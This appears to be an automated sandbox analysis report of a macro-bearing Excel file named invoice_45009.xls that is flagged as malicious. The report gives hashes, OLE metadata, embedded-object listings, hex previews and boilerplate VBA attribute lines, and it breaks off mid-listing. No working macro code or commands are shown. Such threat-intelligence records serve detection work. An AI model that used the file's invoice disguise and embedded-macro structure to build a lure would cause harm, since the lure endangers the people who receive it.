                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 13:53:24 2024, Security: 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1101824
                                                                                                                                                                    Entropy (8bit):7.30061517227484
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xmzHJEHAfwu4hDD3DERnLRmF8DN9rf1o3duFu6YraHS+SkWYmS1N7zJT+TBsFYQf:gLw/hDbARM8b63HrSoSz7laBoPA8K
                                                                                                                                                                    MD5:0C48E70860822B6B12E38A7E866049C8
                                                                                                                                                                    SHA1:BE871C8C76FBD986AE6ACA8DAB2D805D14248C48
                                                                                                                                                                    SHA-256:497F55226524722C46747752F938746AFEE6ED4FF6B680988FB4D4DEAACC3CE7
                                                                                                                                                                    SHA-512:B014C3E3EA0ECAB69D2766891ED320C1EE4B71F9A291C1FFDD4C012B8464C50460A5CD3C89689AF0FC819EC162EA26024A65EE09668B3A575BD3EBB40AC6BE12
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 06:30:56 2024, Security: 1
                                                                                                                                                                    Entropy (8bit):7.262631456193409
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                    File name:invoice_45009.xls
                                                                                                                                                                    File size:1'095'168 bytes
                                                                                                                                                                    MD5:43983a4a84f12dd512b7dd6e1e72dd1d
                                                                                                                                                                    SHA1:bef63e320407ad6b5c2fba7d98e79bd0bc497ea1
                                                                                                                                                                    SHA256:20efb5b024328037e0991db2db376723ee239c5dfa8933dd24fdcc29e7fe8256
                                                                                                                                                                    SHA512:a31f8a061237b7c7df6eb80807eb6d4b87a4a02b3dfea3a0e2c641b07a071009bb5470e46c6a6a976794f74094e759aff44e6d1b72f167288cc23cac3bb3d984
                                                                                                                                                                    SSDEEP:12288:xmzHJEHAfwu4hyD3DERnLRmF8DnPrf1D3dOFu4Ah8d2X73dCS5duPFo8n55Gvv:gLw/hybARM8vd3cAh8dacS5du+8nbGn
                                                                                                                                                                    TLSH:DE35CF83EA1D4F62CE41423066F7577A1320DC43D622872B22F5772839FBAD06956FAD
                                                                                                                                                                    File Content Preview:........................>...............................................................................<.......................j.......l......................................................................................................................
                                                                                                                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                    Number of OLE Files:1
                                                                                                                                                                    Has Summary Info:
                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                                                                    Flash Objects Count:0
                                                                                                                                                                    Contains VBA Macros:True
                                                                                                                                                                    Code Page:1252
                                                                                                                                                                    Author:
                                                                                                                                                                    Last Saved By:
                                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                                    Last Saved Time:2024-10-07 05:30:56
                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                    Security:1
                                                                                                                                                                    Document Code Page:1252
                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                    Shared Document:False
                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                    Application Version:786432
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                                                                    Stream Size:977
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ w ( % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5c 77 28 25 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Attribute VB_Name = "Sheet1"
                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                    

                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                    VBA File Name:Sheet2.cls
                                                                                                                                                                    Stream Size:977
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ w ` . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5c 77 60 83 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Attribute VB_Name = "Sheet2"
                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                    

                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                    VBA File Name:Sheet3.cls
                                                                                                                                                                    Stream Size:977
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ w ~ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5c 77 af 7e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Attribute VB_Name = "Sheet3"
                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                    

                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                                                                    Stream Size:985
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ w T . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5c 77 54 19 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                    

                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x1CompObj
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:114
                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:244
                                                                                                                                                                    Entropy:2.889430592781307
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:200
                                                                                                                                                                    Entropy:3.2603503175049817
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . L . z . . . . . . . . . .
                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/\x1CompObj
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:114
                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/\x5DocumentSummaryInformation
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:244
                                                                                                                                                                    Entropy:2.701136490257069
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/\x5SummaryInformation
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                    Stream Size:90976
                                                                                                                                                                    Entropy:1.885975041684416
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD0018D4CE/\x1Ole
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:20
                                                                                                                                                                    Entropy:0.5689955935892812
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:4
                                                                                                                                                                    Entropy:0.8112781244591328
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . .
                                                                                                                                                                    Data Raw:00 00 03 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD0018D4CE/Contents
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                    Stream Size:197671
                                                                                                                                                                    Entropy:6.989042939766534
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A52B4/\x1CompObj
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:114
                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A52B4/Package
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Stream Size:50945
                                                                                                                                                                    Entropy:7.631071730257267
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A56E1/\x1CompObj
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:114
                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A56E1/Package
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Stream Size:31124
                                                                                                                                                                    Entropy:7.746149934092623
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A5E23/\x1CompObj
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:114
                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    General
                                                                                                                                                                    Stream Path:MBD009D0188/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                                                    CLSID:
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Stream Size:484
                                                                                                                                                                    Entropy:3.922883556049869
                                                                                                                                                                    Base64 Encoded:True
